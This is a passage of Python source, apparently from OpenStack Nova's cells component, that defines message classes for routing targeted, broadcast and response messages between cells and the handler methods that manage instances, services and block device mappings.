routing_path=None, hop_count=0, max_hop_count=None,
**kwargs):
self.ctxt = ctxt
self.resp_queue = None
self.msg_runner = msg_runner
self.state_manager = msg_runner.state_manager
# Copy these.
self.base_attrs_to_json = self.base_attrs_to_json[:]
# Normally this would just be CONF.cells.name, but going through
# the msg_runner allows us to stub it more easily.
self.our_path_part = self.msg_runner.our_name
self.uuid = uuid
if self.uuid is None:
self.uuid = uuidutils.generate_uuid()
self.method_name = method_name
self.method_kwargs = method_kwargs
self.direction = direction
self.need_response = need_response
self.fanout = fanout
self.routing_path = routing_path
self.hop_count = hop_count
if max_hop_count is None:
max_hop_count = CONF.cells.max_hop_count
self.max_hop_count = max_hop_count
self.is_broadcast = False
self._append_hop()
# Each sub-class should set this when the message is inited
self.next_hops = []
self.resp_queue = None
self.serializer = objects_base.NovaObjectSerializer()
def __repr__(self):
_dict = self._to_dict()
_dict.pop('method_kwargs')
return "<%s: %s>" % (self.__class__.__name__, _dict)
def _append_hop(self):
"""Add our hop to the routing_path."""
routing_path = (self.routing_path and
self.routing_path + _PATH_CELL_SEP or '')
self.routing_path = routing_path + self.our_path_part
self.hop_count += 1
def _process_locally(self):
"""Its been determined that we should process this message in this
cell. Go through the MessageRunner to call the appropriate
method for this message. Catch the response and/or exception and
encode it within a Response instance. Return it so the caller
can potentially return it to another cell... or return it to
a caller waiting in this cell.
"""
try:
resp_value = self.msg_runner._process_message_locally(self)
failure = False
except Exception as exc:
resp_value = sys.exc_info()
failure = True
LOG.exception(_("Error processing message locally: %(exc)s"),
{'exc': exc})
return Response(self.routing_path, resp_value, failure)
def _setup_response_queue(self):
"""Shortcut to creating a response queue in the MessageRunner."""
self.resp_queue = self.msg_runner._setup_response_queue(self)
def _cleanup_response_queue(self):
"""Shortcut to deleting a response queue in the MessageRunner."""
if self.resp_queue:
self.msg_runner._cleanup_response_queue(self)
self.resp_queue = None
def _wait_for_json_responses(self, num_responses=1):
"""Wait for response(s) to be put into the eventlet queue. Since
each queue entry actually contains a list of JSON-ified responses,
combine them all into a single list to return.
Destroy the eventlet queue when done.
"""
if not self.resp_queue:
# Source is not actually expecting a response
return
responses = []
wait_time = CONF.cells.call_timeout
try:
for x in xrange(num_responses):
json_responses = self.resp_queue.get(timeout=wait_time)
responses.extend(json_responses)
except queue.Empty:
raise exception.CellTimeout()
finally:
self._cleanup_response_queue()
return responses
def _send_json_responses(self, json_responses, neighbor_only=False,
fanout=False):
"""Send list of responses to this message. Responses passed here
are JSON-ified. Targeted messages have a single response while
Broadcast messages may have multiple responses.
If this cell was the source of the message, these responses will
be returned from self.process().
Otherwise, we will route the response to the source of the
request. If 'neighbor_only' is True, the response will be sent
to the neighbor cell, not the original requester. Broadcast
messages get aggregated at each hop, so neighbor_only will be
True for those messages.
"""
if not self.need_response:
return
if self.source_is_us():
responses = []
for json_response in json_responses:
responses.append(Response.from_json(json_response))
return responses
direction = self.direction == 'up' and 'down' or 'up'
response_kwargs = {'orig_message': self.to_json(),
'responses': json_responses}
target_cell = _response_cell_name_from_path(self.routing_path,
neighbor_only=neighbor_only)
response = self.msg_runner._create_response_message(self.ctxt,
direction, target_cell, self.uuid, response_kwargs,
fanout=fanout)
response.process()
def _send_response(self, response, neighbor_only=False):
"""Send a response to this message. If the source of the
request was ourselves, just return the response. It'll be
passed back to the caller of self.process(). See DocString for
_send_json_responses() as it handles most of the real work for
this method.
'response' is an instance of Response class.
"""
if not self.need_response:
return
if self.source_is_us():
return response
self._send_json_responses([response.to_json()],
neighbor_only=neighbor_only)
def _send_response_from_exception(self, exc_info):
"""Take an exception as returned from sys.exc_info(), encode
it in a Response, and send it.
"""
response = Response(self.routing_path, exc_info, True)
return self._send_response(response)
def _to_dict(self):
"""Convert a message to a dictionary. Only used internally."""
_dict = {}
for key in self.base_attrs_to_json:
_dict[key] = getattr(self, key)
return _dict
def to_json(self):
"""Convert a message into JSON for sending to a sibling cell."""
_dict = self._to_dict()
# Convert context to dict.
_dict['ctxt'] = _dict['ctxt'].to_dict()
# NOTE(comstud): 'method_kwargs' needs special serialization
# because it may contain objects.
method_kwargs = _dict['method_kwargs']
for k, v in method_kwargs.items():
method_kwargs[k] = self.serializer.serialize_entity(self.ctxt, v)
return jsonutils.dumps(_dict)
def source_is_us(self):
"""Did this cell create this message?"""
return self.routing_path == self.our_path_part
def process(self):
"""Process a message. Deal with it locally and/or forward it to a
sibling cell.
Override in a subclass.
"""
raise NotImplementedError()
class _TargetedMessage(_BaseMessage):
"""A targeted message is a message that is destined for a specific
single cell.
'target_cell' can be a full cell name like 'api!child-cell' or it can
be an instance of the CellState class if the target is a neighbor cell.
"""
message_type = 'targeted'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, target_cell, **kwargs):
super(_TargetedMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
if isinstance(target_cell, cells_state.CellState):
# Neighbor cell or ourselves. Convert it to a 'full path'.
if target_cell.is_me:
target_cell = self.our_path_part
else:
target_cell = '%s%s%s' % (self.our_path_part,
_PATH_CELL_SEP,
target_cell.name)
self.target_cell = target_cell
self.base_attrs_to_json.append('target_cell')
def _get_next_hop(self):
"""Return the cell name for the next hop. If the next hop is
the current cell, return None.
"""
if self.target_cell == self.routing_path:
return self.state_manager.my_cell_state
target_cell = self.target_cell
routing_path = self.routing_path
current_hops = routing_path.count(_PATH_CELL_SEP)
next_hop_num = current_hops + 1
dest_hops = target_cell.count(_PATH_CELL_SEP)
if dest_hops < current_hops:
reason_args = {'target_cell': target_cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
dest_name_parts = target_cell.split(_PATH_CELL_SEP)
if (_PATH_CELL_SEP.join(dest_name_parts[:next_hop_num]) !=
routing_path):
reason_args = {'target_cell': target_cell,
'routing_path': routing_path}
reason = _("destination is %(target_cell)s but routing_path "
"is %(routing_path)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
next_hop_name = dest_name_parts[next_hop_num]
if self.direction == 'up':
next_hop = self.state_manager.get_parent_cell(next_hop_name)
else:
next_hop = self.state_manager.get_child_cell(next_hop_name)
if not next_hop:
cell_type = 'parent' if self.direction == 'up' else 'child'
reason_args = {'cell_type': cell_type,
'target_cell': target_cell}
reason = _("Unknown %(cell_type)s when routing to "
"%(target_cell)s") % reason_args
raise exception.CellRoutingInconsistency(reason=reason)
return next_hop
def process(self):
"""Process a targeted message. This is called for all cells
that touch this message. If the local cell is the one that
created this message, we reply directly with a Response instance.
If the local cell is not the target, an eventlet queue is created
and we wait for the response to show up via another thread
receiving the Response back.
Responses to targeted messages are routed directly back to the
source. No eventlet queues are created in intermediate hops.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller.
"""
try:
next_hop = self._get_next_hop()
except Exception as exc:
exc_info = sys.exc_info()
LOG.exception(_("Error locating next hop for message: %(exc)s"),
{'exc': exc})
return self._send_response_from_exception(exc_info)
if next_hop.is_me:
# Final destination.
response = self._process_locally()
return self._send_response(response)
# Need to forward via neighbor cell.
if self.need_response and self.source_is_us():
# A response is needed and the source of the message is
# this cell. Create the eventlet queue.
self._setup_response_queue()
wait_for_response = True
else:
wait_for_response = False
try:
# This is inside the try block, so we can encode the
# exception and return it to the caller.
if self.hop_count >= self.max_hop_count:
raise exception.CellMaxHopCountReached(
hop_count=self.hop_count)
next_hop.send_message(self)
except Exception as exc:
exc_info = sys.exc_info()
err_str = _("Failed to send message to cell: %(next_hop)s: "
"%(exc)s")
LOG.exception(err_str, {'exc': exc, 'next_hop': next_hop})
self._cleanup_response_queue()
return self._send_response_from_exception(exc_info)
if wait_for_response:
# Targeted messages only have 1 response.
remote_response = self._wait_for_json_responses()[0]
return Response.from_json(remote_response)
class _BroadcastMessage(_BaseMessage):
"""A broadcast message. This means to call a method in every single
cell going in a certain direction.
"""
message_type = 'broadcast'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, run_locally=True, **kwargs):
super(_BroadcastMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, **kwargs)
# The local cell creating this message has the option
# to be able to process the message locally or not.
self.run_locally = run_locally
self.is_broadcast = True
def _get_next_hops(self):
"""Set the next hops and return the number of hops. The next
hops may include ourself.
"""
if self.hop_count >= self.max_hop_count:
return []
if self.direction == 'down':
return self.state_manager.get_child_cells()
else:
return self.state_manager.get_parent_cells()
def _send_to_cells(self, target_cells):
"""Send a message to multiple cells."""
for cell in target_cells:
cell.send_message(self)
def _send_json_responses(self, json_responses):
"""Responses to broadcast messages always need to go to the
neighbor cell from which we received this message. That
cell aggregates the responses and makes sure to forward them
to the correct source.
"""
return super(_BroadcastMessage, self)._send_json_responses(
json_responses, neighbor_only=True, fanout=True)
def process(self):
"""Process a broadcast message. This is called for all cells
that touch this message.
The message is sent to all cells in the certain direction and
the creator of this message has the option of whether or not
to process it locally as well.
If responses from all cells are required, each hop creates an
eventlet queue and waits for responses from its immediate
neighbor cells. All responses are then aggregated into a
single list and are returned to the neighbor cell until the
source is reached.
When the source is reached, a list of Response instances are
returned to the caller.
All exceptions for processing the message across the whole
routing path are caught and encoded within the Response and
returned to the caller. It is possible to get a mix of
successful responses and failure responses. The caller is
responsible for dealing with this.
"""
try:
next_hops = self._get_next_hops()
except Exception as exc:
exc_info = sys.exc_info()
LOG.exception(_("Error locating next hops for message: %(exc)s"),
{'exc': exc})
return self._send_response_from_exception(exc_info)
# Short circuit if we don't need to respond
if not self.need_response:
if self.run_locally:
self._process_locally()
self._send_to_cells(next_hops)
return
# We'll need to aggregate all of the responses (from ourself
# and our sibling cells) into 1 response
try:
self._setup_response_queue()
self._send_to_cells(next_hops)
except Exception as exc:
# Error just trying to send to cells. Send a single response
# with the failure.
exc_info = sys.exc_info()
LOG.exception(_("Error sending message to next hops: %(exc)s"),
{'exc': exc})
self._cleanup_response_queue()
return self._send_response_from_exception(exc_info)
if self.run_locally:
# Run locally and store the Response.
local_response = self._process_locally()
else:
local_response = None
try:
remote_responses = self._wait_for_json_responses(
num_responses=len(next_hops))
except Exception as exc:
# Error waiting for responses, most likely a timeout.
# Send a single response back with the failure.
exc_info = sys.exc_info()
err_str = _("Error waiting for responses from neighbor cells: "
"%(exc)s")
LOG.exception(err_str, {'exc': exc})
return self._send_response_from_exception(exc_info)
if local_response:
remote_responses.append(local_response.to_json())
return self._send_json_responses(remote_responses)
class _ResponseMessage(_TargetedMessage):
"""A response message is really just a special targeted message,
saying to call 'parse_responses' when we reach the source of a 'call'.
The 'fanout' attribute on this message may be true if we're responding
to a broadcast or if we're about to respond to the source of an
original target message. Because multiple nova-cells services may
be running within a cell, we need to make sure the response gets
back to the correct one, so we have to fanout.
"""
message_type = 'response'
def __init__(self, msg_runner, ctxt, method_name, method_kwargs,
direction, target_cell, response_uuid, **kwargs):
super(_ResponseMessage, self).__init__(msg_runner, ctxt,
method_name, method_kwargs, direction, target_cell, **kwargs)
self.response_uuid = response_uuid
self.base_attrs_to_json.append('response_uuid')
def process(self):
"""Process a response. If the target is the local cell, process
the response here. Otherwise, forward it to where it needs to
go.
"""
next_hop = self._get_next_hop()
if next_hop.is_me:
self._process_locally()
return
if self.fanout is False:
# Really there's 1 more hop on each of these below, but
# it doesn't matter for this logic.
target_hops = self.target_cell.count(_PATH_CELL_SEP)
current_hops = self.routing_path.count(_PATH_CELL_SEP)
if current_hops + 1 == target_hops:
# Next hop is the target.. so we must fanout. See
# DocString above.
self.fanout = True
next_hop.send_message(self)
#
# Methods that may be called when processing messages after reaching
# a target cell.
#
class _BaseMessageMethods(base.Base):
"""Base class for defining methods by message types."""
def __init__(self, msg_runner):
super(_BaseMessageMethods, self).__init__()
self.msg_runner = msg_runner
self.state_manager = msg_runner.state_manager
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.consoleauth_rpcapi = consoleauth_rpcapi.ConsoleAuthAPI()
self.host_api = compute.HostAPI()
def task_log_get_all(self, message, task_name, period_beginning,
period_ending, host, state):
"""Get task logs from the DB. The message could have
directly targeted this cell, or it could have been a broadcast
message.
If 'host' is not None, filter by host.
If 'state' is not None, filter by state.
"""
task_logs = self.db.task_log_get_all(message.ctxt, task_name,
period_beginning,
period_ending,
host=host,
state=state)
return jsonutils.to_primitive(task_logs)
class _ResponseMessageMethods(_BaseMessageMethods):
"""Methods that are called from a ResponseMessage. There's only
1 method (parse_responses) and it is called when the message reaches
the source of a 'call'. All we do is stuff the response into the
eventlet queue to signal the caller that's waiting.
"""
def parse_responses(self, message, orig_message, responses):
self.msg_runner._put_response(message.response_uuid,
responses)
class _TargetedMessageMethods(_BaseMessageMethods):
"""These are the methods that can be called when routing a message
to a specific cell.
"""
def __init__(self, *args, **kwargs):
super(_TargetedMessageMethods, self).__init__(*args, **kwargs)
def build_instances(self, message, build_inst_kwargs):
"""Parent cell told us to schedule new instance creation."""
self.msg_runner.scheduler.build_instances(message, build_inst_kwargs)
def run_compute_api_method(self, message, method_info):
"""Run a method in the compute api class."""
method = method_info['method']
fn = getattr(self.compute_api, method, None)
if not fn:
detail = _("Unknown method '%(method)s' in compute API")
raise exception.CellServiceAPIMethodNotFound(
detail=detail % {'method': method})
args = list(method_info['method_args'])
# 1st arg is instance_uuid that we need to turn into the
# instance object.
instance_uuid = args[0]
try:
instance = self.db.instance_get_by_uuid(message.ctxt,
instance_uuid)
except exception.InstanceNotFound:
with excutils.save_and_reraise_exception():
# Must be a race condition. Let's try to resolve it by
# telling the top level cells that this instance doesn't
# exist.
instance = {'uuid': instance_uuid}
self.msg_runner.instance_destroy_at_top(message.ctxt,
instance)
# FIXME(comstud): This is temporary/transitional until I can
# work out a better way to pass full objects down.
EXPECTS_OBJECTS = ['start', 'stop', 'delete_instance_metadata',
'update_instance_metadata']
if method in EXPECTS_OBJECTS:
inst_obj = instance_obj.Instance()
inst_obj._from_db_object(message.ctxt, inst_obj, instance)
instance = inst_obj
args[0] = instance
return fn(message.ctxt, *args, **method_info['method_kwargs'])
def update_capabilities(self, message, cell_name, capabilities):
"""A child cell told us about their capabilities."""
LOG.debug("Received capabilities from child cell "
"%(cell_name)s: %(capabilities)s",
{'cell_name': cell_name, 'capabilities': capabilities})
self.state_manager.update_cell_capabilities(cell_name,
capabilities)
# Go ahead and update our parents now that a child updated us
self.msg_runner.tell_parents_our_capabilities(message.ctxt)
def update_capacities(self, message, cell_name, capacities):
"""A child cell told us about their capacity."""
LOG.debug("Received capacities from child cell "
"%(cell_name)s: %(capacities)s",
{'cell_name': cell_name, 'capacities': capacities})
self.state_manager.update_cell_capacities(cell_name,
capacities)
# Go ahead and update our parents now that a child updated us
self.msg_runner.tell_parents_our_capacities(message.ctxt)
def announce_capabilities(self, message):
"""A parent cell has told us to send our capabilities, so let's
do so.
"""
self.msg_runner.tell_parents_our_capabilities(message.ctxt)
def announce_capacities(self, message):
"""A parent cell has told us to send our capacity, so let's
do so.
"""
self.msg_runner.tell_parents_our_capacities(message.ctxt)
def service_get_by_compute_host(self, message, host_name):
"""Return the service entry for a compute host."""
service = self.db.service_get_by_compute_host(message.ctxt,
host_name)
return jsonutils.to_primitive(service)
def service_update(self, message, host_name, binary, params_to_update):
"""Used to enable/disable a service. For compute services, setting to
disabled stops new builds arriving on that host.
:param host_name: the name of the host machine that the service is
running
:param binary: The name of the executable that the service runs as
:param params_to_update: eg. {'disabled': True}
"""
return jsonutils.to_primitive(
self.host_api.service_update(message.ctxt, host_name, binary,
params_to_update))
def service_delete(self, message, service_id):
"""Deletes the specified service."""
self.host_api.service_delete(message.ctxt, service_id)
def proxy_rpc_to_manager(self, message, host_name, rpc_message,
topic, timeout):
"""Proxy RPC to the given compute topic."""
# Check that the host exists.
self.db.service_get_by_compute_host(message.ctxt, host_name)
topic, _sep, server = topic.partition('.')
cctxt = rpc.get_client(messaging.Target(topic=topic,
server=server or None))
method = rpc_message['method']
kwargs = rpc_message['args']
if message.need_response:
cctxt = cctxt.prepare(timeout=timeout)
return cctxt.call(message.ctxt, method, **kwargs)
else:
cctxt.cast(message.ctxt, method, **kwargs)
def compute_node_get(self, message, compute_id):
"""Get compute node by ID."""
compute_node = self.db.compute_node_get(message.ctxt,
compute_id)
return jsonutils.to_primitive(compute_node)
def actions_get(self, message, instance_uuid):
actions = self.db.actions_get(message.ctxt, instance_uuid)
return jsonutils.to_primitive(actions)
def action_get_by_request_id(self, message, instance_uuid, request_id):
action = self.db.action_get_by_request_id(message.ctxt, instance_uuid,
request_id)
return jsonutils.to_primitive(action)
def action_events_get(self, message, action_id):
action_events = self.db.action_events_get(message.ctxt, action_id)
return jsonutils.to_primitive(action_events)
def validate_console_port(self, message, instance_uuid, console_port,
console_type):
"""Validate console port with child cell compute node."""
# 1st arg is instance_uuid that we need to turn into the
# instance object.
try:
instance = self.db.instance_get_by_uuid(message.ctxt,
instance_uuid)
except exception.InstanceNotFound:
with excutils.save_and_reraise_exception():
# Must be a race condition. Let's try to resolve it by
# telling the top level cells that this instance doesn't
# exist.
instance = {'uuid': instance_uuid}
self.msg_runner.instance_destroy_at_top(message.ctxt,
instance)
return self.compute_rpcapi.validate_console_port(message.ctxt,
instance, console_port, console_type)
def get_migrations(self, message, filters):
return self.compute_api.get_migrations(message.ctxt, filters)
def instance_update_from_api(self, message, instance,
expected_vm_state,
expected_task_state,
admin_state_reset):
"""Update an instance in this cell."""
if not admin_state_reset:
# NOTE(comstud): We don't want to nuke this cell's view
# of vm_state and task_state unless it's a forced reset
# via admin API.
instance.obj_reset_changes(['vm_state', 'task_state'])
# NOTE(alaski): A cell should be authoritative for its system_metadata
# and metadata so we don't want to sync it down from the api.
instance.obj_reset_changes(['metadata', 'system_metadata'])
instance.save(message.ctxt, expected_vm_state=expected_vm_state,
expected_task_state=expected_task_state)
def _call_compute_api_with_obj(self, ctxt, instance, method, *args,
**kwargs):
try:
# NOTE(comstud): We need to refresh the instance from this
# cell's view in the DB.
instance.refresh(ctxt)
except exception.InstanceNotFound:
with excutils.save_and_reraise_exception():
# Must be a race condition. Let's try to resolve it by
# telling the top level cells that this instance doesn't
# exist.
instance = {'uuid': instance.uuid}
self.msg_runner.instance_destroy_at_top(ctxt,
instance)
fn = getattr(self.compute_api, method, None)
return fn(ctxt, instance, *args, **kwargs)
def start_instance(self, message, instance):
"""Start an instance via compute_api.start()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'start')
def stop_instance(self, message, instance):
"""Stop an instance via compute_api.stop()."""
do_cast = not message.need_response
return self._call_compute_api_with_obj(message.ctxt, instance,
'stop', do_cast=do_cast)
def reboot_instance(self, message, instance, reboot_type):
"""Reboot an instance via compute_api.reboot()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'reboot',
reboot_type=reboot_type)
def suspend_instance(self, message, instance):
"""Suspend an instance via compute_api.suspend()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'suspend')
def resume_instance(self, message, instance):
"""Resume an instance via compute_api.suspend()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'resume')
def get_host_uptime(self, message, host_name):
return self.host_api.get_host_uptime(message.ctxt, host_name)
def terminate_instance(self, message, instance):
self._call_compute_api_with_obj(message.ctxt, instance, 'delete')
def soft_delete_instance(self, message, instance):
self._call_compute_api_with_obj(message.ctxt, instance, 'soft_delete')
def pause_instance(self, message, instance):
"""Pause an instance via compute_api.pause()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'pause')
def unpause_instance(self, message, instance):
"""Unpause an instance via compute_api.pause()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'unpause')
def resize_instance(self, message, instance, flavor,
extra_instance_updates):
"""Resize an instance via compute_api.resize()."""
self._call_compute_api_with_obj(message.ctxt, instance, 'resize',
flavor_id=flavor['flavorid'],
**extra_instance_updates)
def live_migrate_instance(self, message, instance, block_migration,
disk_over_commit, host_name):
"""Live migrate an instance via compute_api.live_migrate()."""
self._call_compute_api_with_obj(message.ctxt, instance,
'live_migrate', block_migration,
disk_over_commit, host_name)
def revert_resize(self, message, instance):
"""Revert a resize for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'revert_resize')
def confirm_resize(self, message, instance):
"""Confirm a resize for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'confirm_resize')
def reset_network(self, message, instance):
"""Reset networking for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'reset_network')
def inject_network_info(self, message, instance):
"""Inject networking for an instance in its cell."""
self._call_compute_api_with_obj(message.ctxt, instance,
'inject_network_info')
def snapshot_instance(self, message, instance, image_id):
"""Snapshot an instance in its cell."""
instance.refresh()
instance.task_state = task_states.IMAGE_SNAPSHOT_PENDING
instance.save(expected_task_state=[None])
self.compute_rpcapi.snapshot_instance(message.ctxt,
instance,
image_id)
def backup_instance(self, message, instance, image_id,
backup_type, rotation):
"""Backup an instance in its cell."""
instance.refresh()
instance.task_state = task_states.IMAGE_BACKUP
instance.save(expected_task_state=[None])
self.compute_rpcapi.backup_instance(message.ctxt,
instance,
image_id,
backup_type,
rotation)
def rebuild_instance(self, message, instance, image_href, admin_password,
files_to_inject, preserve_ephemeral, kwargs):
kwargs['preserve_ephemeral'] = preserve_ephemeral
self._call_compute_api_with_obj(message.ctxt, instance, 'rebuild',
image_href, admin_password,
files_to_inject, **kwargs)
class _BroadcastMessageMethods(_BaseMessageMethods):
"""These are the methods that can be called as a part of a broadcast
message.
"""
def _at_the_top(self):
"""Are we the API level?"""
return not self.state_manager.get_parent_cells()
def _apply_expected_states(self, instance_info):
"""To attempt to address out-of-order messages, do some sanity
checking on the VM and task states. Add some requirements for
vm_state and task_state to the instance_update() DB call if
necessary.
"""
expected_vm_state_map = {
# For updates containing 'vm_state' of 'building',
# only allow them to occur if the DB already says
# 'building' or if the vm_state is None. None
# really shouldn't be possible as instances always
# start out in 'building' anyway.. but just in case.
vm_states.BUILDING: [vm_states.BUILDING, None]}
expected_task_state_map = {
# Always allow updates when task_state doesn't change,
# but also make sure we don't set resize/rebuild task
# states for old messages when we've potentially already
# processed the ACTIVE/None messages. Ie, these checks
# will prevent stomping on any ACTIVE/None messages
# we already processed.
task_states.REBUILD_BLOCK_DEVICE_MAPPING:
[task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILDING],
task_states.REBUILD_SPAWNING:
[task_states.REBUILD_SPAWNING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILDING],
task_states.RESIZE_MIGRATING:
[task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP],
task_states.RESIZE_MIGRATED:
[task_states.RESIZE_MIGRATED,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP],
task_states.RESIZE_FINISH:
[task_states.RESIZE_FINISH,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_PREP]}
if 'vm_state' in instance_info:
expected = expected_vm_state_map.get(instance_info['vm_state'])
if expected is not None:
instance_info['expected_vm_state'] = expected
if 'task_state' in instance_info:
expected = expected_task_state_map.get(instance_info['task_state'])
if expected is not None:
instance_info['expected_task_state'] = expected
def instance_update_at_top(self, message, instance, **kwargs):
"""Update an instance in the DB if we're a top level cell."""
if not self._at_the_top():
return
instance_uuid = instance['uuid']
# Remove things that we can't update in the top level cells.
# 'metadata' is only updated in the API cell, so don't overwrite
# it based on what child cells say. Make sure to update
# 'cell_name' based on the routing path.
items_to_remove = ['id', 'security_groups', 'volumes', 'cell_name',
'name', 'metadata']
for key in items_to_remove:
instance.pop(key, None)
instance['cell_name'] = _reverse_path(message.routing_path)
# Fixup info_cache. We'll have to update this separately if
# it exists.
info_cache = instance.pop('info_cache', None)
if info_cache is not None:
info_cache.pop('id', None)
info_cache.pop('instance', None)
if 'system_metadata' in instance:
# Make sure we have the dict form that we need for
# instance_update.
instance['system_metadata'] = utils.instance_sys_meta(instance)
LOG.debug("Got update for instance: %(instance)s",
{'instance': instance}, instance_uuid=instance_uuid)
self._apply_expected_states(instance)
# It's possible due to some weird condition that the instance
# was already set as deleted... so we'll attempt to update
# it with permissions that allows us to read deleted.
with utils.temporary_mutation(message.ctxt, read_deleted="yes"):
try:
self.db.instance_update(message.ctxt, instance_uuid,
instance, update_cells=False)
except exception.NotFound:
# FIXME(comstud): Strange. Need to handle quotas here,
# if we actually want this code to remain..
self.db.instance_create(message.ctxt, instance)
if info_cache:
network_info = info_cache.get('network_info')
if isinstance(network_info, list):
if not isinstance(network_info, network_model.NetworkInfo):
network_info = network_model.NetworkInfo.hydrate(
network_info)
info_cache['network_info'] = network_info.json()
try:
self.db.instance_info_cache_update(
message.ctxt, instance_uuid, info_cache)
except exception.InstanceInfoCacheNotFound:
# Can happen if we try to update a deleted instance's
# network information.
pass
def instance_destroy_at_top(self, message, instance, **kwargs):
"""Destroy an instance from the DB if we're a top level cell."""
if not self._at_the_top():
return
instance_uuid = instance['uuid']
LOG.debug("Got update to delete instance",
instance_uuid=instance_uuid)
try:
self.db.instance_destroy(message.ctxt, instance_uuid,
update_cells=False)
except exception.InstanceNotFound:
pass
def instance_delete_everywhere(self, message, instance, delete_type,
**kwargs):
"""Call compute API delete() or soft_delete() in every cell.
This is used when the API cell doesn't know what cell an instance
belongs to but the instance was requested to be deleted or
soft-deleted. So, we'll run it everywhere.
"""
LOG.debug("Got broadcast to %(delete_type)s delete instance",
{'delete_type': delete_type}, instance=instance)
if delete_type == 'soft':
self.compute_api.soft_delete(message.ctxt, instance)
else:
self.compute_api.delete(message.ctxt, instance)
def instance_fault_create_at_top(self, message, instance_fault, **kwargs):
"""Destroy an instance from the DB if we're a top level cell."""
if not self._at_the_top():
return
items_to_remove = ['id']
for key in items_to_remove:
instance_fault.pop(key, None)
log_str = _("Got message to create instance fault: "
"%(instance_fault)s")
LOG.debug(log_str, {'instance_fault': instance_fault})
fault = instance_fault_obj.InstanceFault(context=message.ctxt)
fault.update(instance_fault)
fault.create()
def bw_usage_update_at_top(self, message, bw_update_info, **kwargs):
"""Update Bandwidth usage in the DB if we're a top level cell."""
if not self._at_the_top():
return
self.db.bw_usage_update(message.ctxt, **bw_update_info)
def _sync_instance(self, ctxt, instance):
if instance['deleted']:
self.msg_runner.instance_destroy_at_top(ctxt, instance)
else:
self.msg_runner.instance_update_at_top(ctxt, instance)
def sync_instances(self, message, project_id, updated_since, deleted,
**kwargs):
projid_str = project_id is None and "<all>" or project_id
since_str = updated_since is None and "<all>" or updated_since
LOG.info(_("Forcing a sync of instances, project_id="
"%(projid_str)s, updated_since=%(since_str)s"),
{'projid_str': projid_str, 'since_str': since_str})
if updated_since is not None:
updated_since = timeutils.parse_isotime(updated_since)
instances = cells_utils.get_instances_to_sync(message.ctxt,
updated_since=updated_since, project_id=project_id,
deleted=deleted)
for instance in instances:
self._sync_instance(message.ctxt, instance)
def service_get_all(self, message, filters):
if filters is None:
filters = {}
disabled = filters.pop('disabled', None)
services = self.db.service_get_all(message.ctxt, disabled=disabled)
ret_services = []
for service in services:
service = jsonutils.to_primitive(service)
for key, val in filters.iteritems():
if service[key] != val:
break
else:
ret_services.append(service)
return ret_services
def compute_node_get_all(self, message, hypervisor_match):
"""Return compute nodes in this cell."""
if hypervisor_match is not None:
nodes = self.db.compute_node_search_by_hypervisor(message.ctxt,
hypervisor_match)
else:
nodes = self.db.compute_node_get_all(message.ctxt)
return jsonutils.to_primitive(nodes)
def compute_node_stats(self, message):
"""Return compute node stats from this cell."""
return self.db.compute_node_statistics(message.ctxt)
def consoleauth_delete_tokens(self, message, instance_uuid):
"""Delete consoleauth tokens for an instance in API cells."""
if not self._at_the_top():
return
self.consoleauth_rpcapi.delete_tokens_for_instance(message.ctxt,
instance_uuid)
def bdm_update_or_create_at_top(self, message, bdm, create):
"""Create or update a block device mapping in API cells. If
create is True, only try to create. If create is None, try to
update but fall back to create. If create is False, only attempt
to update. This maps to nova-conductor's behavior.
"""
if not self._at_the_top():
return
items_to_remove = ['id']
for key in items_to_remove:
bdm.pop(key, None)
if create is None:
self.db.block_device_mapping_update_or_create(message.ctxt,
bdm,
legacy=False)
return
elif create is True:
self.db.block_device_mapping_create(message.ctxt, bdm,
legacy=False)
return
# Unfortunately this update call wants BDM ID... but we don't know
# what it is in this cell. Search for it.. try matching either
# device_name or volume_id.
dev_name = bdm['device_name']
vol_id = bdm['volume_id']
instance_bdms = self.db.block_device_mapping_get_all_by_instance(
message.ctxt, bdm['instance_uuid'])
for instance_bdm in instance_bdms:
if dev_name and instance_bdm['device_name'] == dev_name:
break
if vol_id and instance_bdm['volume_id'] == vol_id:
break
else:
LOG.warn(_("No match when trying to update BDM: %(bdm)s"),
dict(bdm=bdm))
return
self.db.block_device_mapping_update(message.ctxt,
instance_bdm['id'], bdm,
legacy=False)
def bdm_destroy_at_top(self, message, instance_uuid, device_name,
volume_id):
"""Destroy a block device mapping in API cells by device name
or volume_id. device_name or volume_id can be None, but not both.
"""
if not self._at_the_top():
return
if device_name:
self.db.block_device_mapping_destroy_by_instance_and_device(
message.ctxt, instance_uuid, device_name)
elif volume_id:
self.db.block_device_mapping_destroy_by_instance_and_volume(
message.ctxt, instance_uuid, volume_id)
def get_migrations(self, message, filters):
context = message.ctxt
return self.compute_api.get_migrations(context, filters)
_CELL_MESSAGE_TYPE_TO_MESSAGE_CLS = {'targeted': _TargetedMessage,
'broadcast': _BroadcastMessage,
'response': _ResponseMessage}
_CELL_MESSAGE_TYPE_TO_METHODS_CLS = {'targeted': _TargetedMessageMethods,
'broadcast': _BroadcastMessageMethods,
'response': _ResponseMessageMethods}
#
# Below are the public interfaces into this module.
#
class MessageRunner(object):
"""This class is the main interface into creating messages and
processing them.
Public methods in this class are typically called by the CellsManager
